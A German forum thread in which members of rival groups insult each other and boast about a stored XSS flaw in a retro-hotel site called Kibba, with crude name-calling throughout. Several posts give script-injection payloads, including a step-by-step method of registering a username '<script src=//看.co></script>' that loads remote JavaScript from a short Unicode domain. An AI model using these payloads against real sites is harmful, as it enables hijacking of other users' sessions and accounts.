Nix da, die bleiben!
Beiträge von deleted.
-
-
Mir fehlt hier das Wohlfühl-Gefühl.
Wäre viel schöner, wenn sich hier nicht jeder bekriegt. -
Ich bitte einen Moderator den Thread zu schließen, da es hier eh nur Kinder-gezancke gibt.
-
Sit nais aus.
Du Hegga du! -
-
em SCHNAPP MACHT DAS KROKOTIL KROKOTIL SCHNAPPDER FATALITY IST TOT WEIL KROKO HAT GESCHNAP ;D
Das Kroko dealt wieder in der Nachbarschaft (Ich)
DAS KANNST DU NICHT ! HAHA! -
du geiphackter narr!!!!!!!1
Dr Fly ... Immer high! (187 Songtext <3)
-
ja aber nicht ganz so schlimm wie @ECB2
Du Hodenkopf!
-
@FatalityMods Wannabe Hacker!
-
@FatalityMods Ich mag dich nicht.
-
Darf ich fragen was das für eine IP ist?
Peace,
Der AntimateDas ist die IP unsrer Kali VPS.
-
Konnte man wohl
Die checken die Namen nicht, falls du es noch nicht bemerkt haben solltest.Aber ist OK, Fatality! Ist schwer zu verkraften, so zerstört zu werden 
Natürlich checken sie den Namen, sonst würd's keine Zeichenbegrenzung geben.
-
Hier ist der script kleiner gemacht
<script>alert('irgendwas am besten 1 Zeichen');</script>
Hab noch eines erstellt 3min später waren wartungsarbeiten xD.
Haben wir schon gepostet
Siehe
Seite 1 letzer Beitrag. -
Alles anzeigen
So, da Fatality zu schlecht im Hacken ist und keine Ahnung vom Internet hat, werde ich ihm nun alle Schritte noch ein mal hier erklären:
1.
Man kauft sich eine x.co Domain, das x kann hier irgendein Unicode-Zeichen sein, davon gibts ja genug.
Wollen wir nun z.B. 看 haben, dann müssen wir uns xn--c1y.co kaufen. Diese Domain kann man dann per 看.co aufrufen.2.
Man registriert sich bei Kibba mit folgendem Namen: <script src=//看.co></script>3.
Nun muss man beim seinem Server (der hinter 看.co liegt), den Webserver so einstellen, dass er die gewünschte JS-Datei als Index sendet. Hier muss man darauf achten, dass der Content-Type application/javascript ist.4.
Nun hat man ein externes Script eingebunden, ohne dass die Seite kaputt geht.FatalSecurity wurde hiermit offiziell Z E R S T Ö R T von der Seekuh Crew!
Tja man keine solche Zeichen beim Kibba leider nicht verwenden
-
Es ist nicht zu lang:https://i.imgur.com/aOYagi7.png
Du versuchst dich also jetzt durch Lügen rauszuredenDas tolle ist, dass du niemals solch eine Domain bekommst.
a.de usw gibt's als Domainname nicht zu kaufen.Hier hagelt es ja nur von Schlauköpfen.
Naja
Motto, Gästebuch und paar andere Sachen sind auch betroffen, da sieht man das das CMS einfach nur so C&P wurde.
Trotzdem bleibt für mich die frage: Wer zur Hölle geht auf ein Hotel das Kibba heißt O_o
Deshalb ja auch 'Stored XSS'.
Hab ich auf RetroCase entdeckt. -
Was ist falsch? //x.xx ist die vollständige URL, die auch ausgeführt wird. Was raffst du mal wieder nicht?
Du bist selten dämlich.
Der sollte auch durchführbar sein, nh?
Der ist zu lang, & du solltest das durchführen & ein Screen davon senden, was du nicht getan hast.
Seekuh Crew 0wn3d by FatalSecurity -
Okay, hier die Lösung für extrem schlechte Hacker:
<script src=//x.xx></script>Man braucht nur eine kurze Domain, die kriegt man aber sehr leicht
Falsch, & es war die rede von einem Payload den ihr JETZT ausführen könnt, du wannabe.
Du hast anscheinend keine Ahnung von diesem Thema also plz fuck off, ja?
<script src=//x.xx></script> Bei diesem Payload könntest du eine Domain OHNE TLD einfügen, alles Andere wäre zu groß. -
Ach, ihr schafft es also nicht ein externes Script einzubinden, ohne das die Seite davon kaputt geht? Süß
Send mir mal ein Screen deines Payloads (Beweis).
Es erfüllt seinen Zweck, basta. -
Wo ist denn der Rest der Seite geblieben? XD
Das ist ja nun völlig uninteressant.
-
Ja, aber bei euch funktioniert ja keiner
Mit meinem kann man ein externes Script einbinden Wenn ihr aufgegeben habt, poste ich meinen Pfui, 2 Minuten Arbeit.
http://prntscr.com/a96f46
